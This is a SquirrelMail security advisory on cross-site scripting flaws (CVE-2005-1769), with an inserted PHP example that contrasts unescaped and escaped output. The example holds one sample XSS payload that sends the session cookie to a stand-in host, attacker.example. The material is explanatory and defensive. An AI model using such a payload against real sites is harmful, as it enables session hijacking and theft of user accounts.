SquirrelMail  

Security

Several cross site scripting vulnerabilities

Date:
2005-06-15
Description:
Several cross site scripting (XSS) vulnerabilities have been discovered in SquirrelMail versions 1.4.0 - 1.4.4. These have been addressed in a patch that has been uploaded to the SF.net file releases system. We advise all our users to apply this patch. We're also releasing SquirrelMail 1.4.5 release candidate 1 at the same time. We expect version 1.4.5 to be out within two weeks from now.

The vulnerabilities fall into two categories: the majority can be exploited through URL manipulation (the victim follows a crafted link), and some by sending a specially crafted email to the victim. With care, an attacker can use either to hijack the session of the logged-in user.

We know that versions 1.4.0 to 1.4.3a are vulnerable to most of the issues. The 1.2.x series is no longer supported; we advise users of that series to upgrade to 1.4.4 with the patch applied.
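The two classes of bug described above, shown as an added illustration in PHP. This is not SquirrelMail's own code and does not reproduce any of the patched locations; the parameter name `mailbox`, the page fragments, the attacker host and the sample inputs are all assumptions made for the example.

```php
<?php
// Added illustration, not SquirrelMail code. It shows the two bug classes the
// advisory names (a value reflected from the URL, and a header taken from a
// crafted message) in a vulnerable and a hardened form. Parameter names, page
// layout and sample inputs are constructed for this example.

// Vulnerable: the mailbox name from the query string is copied straight into
// the page, so a link like ?mailbox=<script>...</script> runs in the victim's
// session as soon as the victim clicks it.
function render_folder_title_vulnerable(array $get): string
{
    $mailbox = isset($get['mailbox']) ? $get['mailbox'] : 'INBOX';
    return "<h1>Folder: $mailbox</h1>";
}

// Hardened: every untrusted value is HTML-escaped at the point of output.
// ENT_QUOTES also escapes single quotes, so the value is safe inside
// attributes quoted with either character.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
}

function render_folder_title_hardened(array $get): string
{
    $mailbox = isset($get['mailbox']) ? $get['mailbox'] : 'INBOX';
    return '<h1>Folder: ' . h($mailbox) . '</h1>';
}

// Second category: a value the attacker controls simply by sending mail. Here
// the Subject header is shown in the message list; the same rule applies.
function render_subject_row_vulnerable(string $subject): string
{
    return "<td>$subject</td>";
}

function render_subject_row_hardened(string $subject): string
{
    return '<td>' . h($subject) . '</td>';
}

// Constructed inputs: a benign value and a textbook payload that would send the
// session cookie to a host the attacker controls (attacker.example is made up).
$payload = "<script>document.location='http://attacker.example/c?'+document.cookie</script>";
$samples = [
    'benign'  => ['mailbox' => 'INBOX.Sent'],
    'payload' => ['mailbox' => $payload],
];

foreach ($samples as $name => $get) {
    echo "== $name (URL category) ==\n";
    echo 'vulnerable: ' . render_folder_title_vulnerable($get) . "\n";
    echo 'hardened:   ' . render_folder_title_hardened($get) . "\n";
}

echo "== payload (crafted e-mail category) ==\n";
echo 'vulnerable: ' . render_subject_row_vulnerable($payload) . "\n";
echo 'hardened:   ' . render_subject_row_hardened($payload) . "\n";

// Defence in depth against the session-hijack outcome the advisory mentions:
// a session cookie flagged HttpOnly is not readable from document.cookie even
// when an escape is missed (PHP 5.2 and later). It does not replace output
// escaping, which is what the patch is about.
// ini_set('session.cookie_httponly', '1');
```

Run with `php example.php`. In the vulnerable output the payload appears as live markup; in the hardened output it appears as `&lt;script&gt;...`, which the browser renders as text. The fix pattern is the same for both categories: escape at output, never trust that a value was safe because it came from a mailbox name, a header or any other field the server did not generate itself.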
Affected Versions:
<= 1.4.4
Register Globals:
Register_globals does not have to be on for this issue.
CVE ID(s):
CVE-2005-1769
Patch:
view patch
Credits:
Martijn Brinkers for finding the majority of the issues
This page last updated:
2006-07-09 15:52:28
© 1999-2010 by The SquirrelMail Project Team